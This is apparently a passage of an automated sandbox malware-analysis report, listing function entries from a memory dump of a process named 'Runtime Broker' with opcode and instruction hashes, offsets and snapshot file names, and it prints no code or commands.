                                  • Opcode ID: 4724b5304eef8bb8c8d0777ed3be0471e30f3c7dce370a19358a4cf87a689674
                                  • Instruction ID: f514421c1f2f3bb592f3fe7e7a77e3d11af8734f4687f65f2656a7a5af2f06be
                                  • Opcode Fuzzy Hash: 4724b5304eef8bb8c8d0777ed3be0471e30f3c7dce370a19358a4cf87a689674
                                  • Instruction Fuzzy Hash: 8B31C532A0E7964FD726EBBC98B10E53B70EF65329B0902F7D499CA0E7DD286446C351
                                  Function 00007FFD9BAD1242 Relevance: .5, Instructions: 465COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a207d860a4d1eeebb97708752e45ff8560232e006cd1a63b6291a2100c2a6bf0
                                  • Instruction ID: 4a128012e049049d987488fb3a2aa5be02ecb97b8800ce1c22883238ca27d4f6
                                  • Opcode Fuzzy Hash: a207d860a4d1eeebb97708752e45ff8560232e006cd1a63b6291a2100c2a6bf0
                                  • Instruction Fuzzy Hash: 3221EA63F0E6DA0FD76197BC98B10E57B71EFA226570902B7D0D9DA0A3DD1924068391
                                  Function 00007FFD9BAD0E4E Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d3a53a0a667b40026afb8c92409f33ffb22c791017612ba94b037d3b1c7a43d
                                  • Instruction ID: 94c24b7c1afee07777b0b4625fa9e08ec4aa08c808536b41a5ced446903db87b
                                  • Opcode Fuzzy Hash: 1d3a53a0a667b40026afb8c92409f33ffb22c791017612ba94b037d3b1c7a43d
                                  • Instruction Fuzzy Hash: 96511422B0E68A0FE366A77C98365B53BD1DFD6225B0941FBE08DCB1E7DC185846C352
                                  Function 00007FFD9BAD07A5 Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fbfa049afe49dfd94faa4fde1d618af97269406b405af458a1230c35c88f39e
                                  • Instruction ID: 5b99207b0a359a3b64065a86ccd48fcbd86cbf671aaa9d4833cad92872190adf
                                  • Opcode Fuzzy Hash: 1fbfa049afe49dfd94faa4fde1d618af97269406b405af458a1230c35c88f39e
                                  • Instruction Fuzzy Hash: 98511A36B095894FC348FB6C98B15E93BA1EF8522F74442BBE49DCB2DBCE285405CB50
                                  Function 00007FFD9BAD0B5F Relevance: .2, Instructions: 155COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 637df0eca02f7bbd056967d18e2afb519ea7c8d62f29a9216be38142e8b4e388
                                  • Instruction ID: 011853d5bdda50f430d3543d00e9e1b6b7433c8866e02ef6e6c95748c772ed0e
                                  • Opcode Fuzzy Hash: 637df0eca02f7bbd056967d18e2afb519ea7c8d62f29a9216be38142e8b4e388
                                  • Instruction Fuzzy Hash: 1A41F431B0891E8FDB48EBACD8756ED73A1FF9831AF500279E008D729ACE35A445C780
                                  Function 00007FFD9BAD0650 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e4a3d226ece2322ea37315e85a02f568bb4108412a71e7cdec460275763cdd
                                  • Instruction ID: bfbc960541c46bcb07516c88665935375e8e1be84658d46fa5950df3780dc1e5
                                  • Opcode Fuzzy Hash: c1e4a3d226ece2322ea37315e85a02f568bb4108412a71e7cdec460275763cdd
                                  • Instruction Fuzzy Hash: EA31E821B18A480FE798EB6C986A67977C2EFD9315F0506BEF00EC32D7DD645C428341
                                  Function 00007FFD9BAD0CE9 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fedd32407b446133a2bf4b5865bcd06959f8ce17b0ff0839d727cb9756f5d59e
                                  • Instruction ID: fc280b5e236fda0861fa6226675dc1ea0ba5d5f9fa78dc6a9243f7050728eb65
                                  • Opcode Fuzzy Hash: fedd32407b446133a2bf4b5865bcd06959f8ce17b0ff0839d727cb9756f5d59e
                                  • Instruction Fuzzy Hash: BB31B622B199094FE794BBBC5C2A7BD76D1EF98721F0503B6F01DC71D6DD6869028382
                                  Function 00007FFD9BAD2311 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.2440508470.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_7ffd9bad0000_Runtime Broker.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39aa609bf1c0e658fab62424a02e7a0f962f65ff0450573aa1d8bb45fc4c3698
                                  • Instruction ID: e7be887c2fef71b2ca80169b1c0e27e45f68f5efcd2f3123bafddd22be885c18
                                  • Opcode Fuzzy Hash: 39aa609bf1c0e658fab62424a02e7a0f962f65ff0450573aa1d8bb45fc4c3698
                                  • Instruction Fuzzy Hash: 9B014711A0DBC94FE765A3A88865431BFE0DFD1211B0902FAE8C8C60ABD848AA40C352